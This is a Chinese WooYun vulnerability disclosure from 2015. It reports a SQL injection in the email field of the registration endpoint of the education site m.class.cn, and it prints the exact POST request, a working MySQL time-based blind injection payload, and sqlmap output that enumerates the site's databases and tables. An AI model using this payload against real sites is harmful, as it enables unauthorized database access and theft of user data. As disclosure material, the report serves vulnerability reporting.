漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0146922
漏洞标题:好课网用户注册页面,SQL注入一枚,泄露全站用户信息
相关厂商:好课网
漏洞作者: 逆流冰河
提交时间:2015-10-15 15:49
修复时间:2015-10-15 16:24
公开时间:2015-10-15 16:24
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-10-15: 细节已通知厂商并且等待厂商处理中
2015-10-15: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
昨天提交一个,和别人重复了,心情不好了,求满分
详细说明:
1,注入点:
POST http://m.class.cn/user/register_ajax HTTP/1.1
email=aaa%40aa.com&passwd=aaaa1111&conpasswd=aaaa1111&nickName=ffdfsd.x&act=reg
第一个参数Email就有注入
2,看看具体结果
Parameter: email (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: email=aaa@aaa.com' AND (SELECT * FROM (SELECT(SLEEP(5)))SeIC) AND 'KpgP'='KpgP&passwd=aaaa1111&conpasswd=aaaa1111&nickName=aaaa1111&act=reg
---
web application technology: PHP 5.4.10
back-end DBMS: MySQL 5.0.12
available databases [2]:
[*] bbsnew
[*] information_schema
3,大概151张表
back-end DBMS: MySQL 5.0.12
[11:56:51] [INFO] fetching tables for database: 'bbsnew'
[11:56:51] [INFO] fetching number of tables for database 'bbsnew'
[11:56:51] [INFO] resumed: 151
[11:56:51] [INFO] resumed: cdb_access
漏洞证明:
如上
修复方案:
求满分
版权声明:转载请注明来源 逆流冰河@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-10-15 16:24
厂商回复:
非常感谢提交漏洞。此漏洞已经修补。
最新状态:
暂无